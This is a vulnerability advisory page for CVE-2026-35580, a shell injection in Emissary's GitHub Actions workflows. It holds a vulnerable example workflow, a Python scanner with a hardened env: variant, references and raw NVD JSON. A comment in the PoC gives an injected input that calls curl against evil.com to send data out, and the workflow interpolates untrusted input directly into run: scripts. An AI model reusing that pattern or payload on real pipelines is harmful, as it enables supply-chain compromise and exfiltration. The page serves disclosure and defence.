Security Vulnerability Report
CVE-2026-35580 CVSS 9.1 CRITICAL

Published: 2026-04-07 17:16:33
Last Modified: 2026-04-16 17:59:03

Description

Emissary is a P2P based data-driven workflow engine. Prior to 8.39.0, GitHub Actions workflow files contained shell injection points where user-controlled workflow_dispatch inputs were interpolated directly into shell commands via ${{ }} expression syntax. An attacker with repository write access could inject arbitrary shell commands, leading to repository poisoning and supply chain compromise affecting all downstream users. This vulnerability is fixed in 8.39.0.

CVSS Details

CVSS Score
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:nsa:emissary:*:*:*:*:*:*:*:* - VULNERABLE
Emissary < 8.39.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
yaml
# Vulnerable Workflow Concept (CVE-2026-35580)
# An attacker with write access can trigger this workflow with malicious input.
name: Build Emissary
on:
  workflow_dispatch:
    inputs:
      config_option:
        description: 'Configuration option'
        required: true
        default: 'default_value'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout code
        uses: actions/checkout@v3
      - name: Build with user input
        # VULNERABILITY: The input is interpolated directly into the shell command.
        # If input is: 'value; curl http://evil.com/exfil', the curl command will execute.
        run: |
          echo "Starting build with configuration: ${{ github.event.inputs.config_option }}"
          ./configure --opt="${{ github.event.inputs.config_option }}"
          make all
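As an added defender-side example (not part of this report and not code from the Emissary project), the following Python scanner flags `workflow_dispatch` input expressions that are interpolated into `run:` scripts, and carries the `env:` indirection that removes the injection point. The two workflow samples are constructed for the example and mirror the shape of the PoC above; the line-based YAML handling and the list of untrusted expression contexts are simplifying assumptions, not a complete parser.

```python
import re

# Expression contexts that deliver user-controlled text into a workflow.  Only the
# workflow_dispatch input contexts named in the advisory are listed; the list is an
# assumption of this example and can be extended with other event payload fields.
UNTRUSTED_CONTEXT = re.compile(
    r"\$\{\{\s*((?:github\.event\.)?inputs\.[\w.-]+)[^}]*\}\}"
)

# A `run:` key, either on its own line or as the first key of a list item (`- run:`).
RUN_KEY = re.compile(r"^(?:-\s+)?run:\s*(.*)$")


def find_run_injections(workflow_text):
    """Scan workflow YAML line by line and report every untrusted ${{ }} expression
    that is expanded inside a `run:` script.

    Returns a list of (line_number, expression) tuples.  The parser is deliberately
    minimal: it understands `run:` and `- run:`, inline values and `|`/`>` block
    scalars, which covers the shape of the workflow in the advisory.
    """
    findings = []
    in_run = False
    key_indent = -1
    for lineno, raw in enumerate(workflow_text.splitlines(), 1):
        stripped = raw.strip()
        if not stripped:
            continue                      # blank lines never close a block scalar
        if stripped.startswith("#") and not in_run:
            continue                      # YAML comment outside a run block
        indent = len(raw) - len(raw.lstrip(" "))
        key_match = RUN_KEY.match(stripped)
        if key_match:
            in_run = True
            # For "- run:" the key itself sits two columns right of the dash.
            key_indent = indent + (2 if stripped.startswith("-") else 0)
            candidate = key_match.group(1)
        elif in_run and indent > key_indent:
            candidate = stripped          # continuation line of the block scalar
        else:
            in_run = False                # dedent closes the run block
            continue
        for expr in UNTRUSTED_CONTEXT.finditer(candidate):
            findings.append((lineno, expr.group(1)))
    return findings


# Constructed sample: the vulnerable shape from the advisory (expression inside run:).
VULNERABLE_WORKFLOW = """\
name: Build Emissary
on:
  workflow_dispatch:
    inputs:
      config_option:
        description: 'Configuration option'
        required: true
        default: 'default_value'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout code
        uses: actions/checkout@v3
      - name: Build with user input
        run: |
          echo "Starting build with configuration: ${{ github.event.inputs.config_option }}"
          ./configure --opt="${{ github.event.inputs.config_option }}"
          make all
"""

# Constructed sample: the same step hardened.  The expression is bound to an
# environment variable, so the shell sees only a quoted variable and the input
# can no longer change the script text.
HARDENED_WORKFLOW = """\
name: Build Emissary
on:
  workflow_dispatch:
    inputs:
      config_option:
        description: 'Configuration option'
        required: true
        default: 'default_value'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout code
        uses: actions/checkout@v3
      - name: Build with user input
        env:
          CONFIG_OPTION: ${{ github.event.inputs.config_option }}
        run: |
          echo "Starting build with configuration: $CONFIG_OPTION"
          ./configure --opt="$CONFIG_OPTION"
          make all
"""

if __name__ == "__main__":
    for label, text in (("vulnerable", VULNERABLE_WORKFLOW), ("hardened", HARDENED_WORKFLOW)):
        print(label, find_run_injections(text))
```

The scanner reports the two interpolations in the vulnerable step and nothing in the hardened one, because the `${{ }}` expression in the hardened version lives under `env:` rather than in the script. That intermediate environment variable is the mitigation GitHub documents for script injection: the runner expands the expression before the script is written, so an expression inside `run:` is textual substitution into shell source, whereas a value in `env:` reaches the shell as data that the script quotes.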

References

https://github.com/NationalSecurityAgency/emissary/pull/1286 (Patch)
https://github.com/NationalSecurityAgency/emissary/pull/1288 (Patch)
https://github.com/NationalSecurityAgency/emissary/security/advisories/GHSA-3g6g-gq4r-xjm9 (Exploit, Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-35580", "sourceIdentifier": "[email protected]", "published": "2026-04-07T17:16:33.307", "lastModified": "2026-04-16T17:59:02.860", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Emissary is a P2P based data-driven workflow engine. Prior to 8.39.0, GitHub Actions workflow files contained shell injection points where user-controlled workflow_dispatch inputs were interpolated directly into shell commands via ${{ }} expression syntax. An attacker with repository write access could inject arbitrary shell commands, leading to repository poisoning and supply chain compromise affecting all downstream users. This vulnerability is fixed in 8.39.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.3, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-77"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nsa:emissary:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.10.0", "versionEndIncluding": "8.38.0", "matchCriteriaId": "63C8A099-EC01-496B-A224-0B1E8AA2A980"}]}]}], "references": [{"url": "https://github.com/NationalSecurityAgency/emissary/pull/1286", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/NationalSecurityAgency/emissary/pull/1288", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/NationalSecurityAgency/emissary/security/advisories/GHSA-3g6g-gq4r-xjm9", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}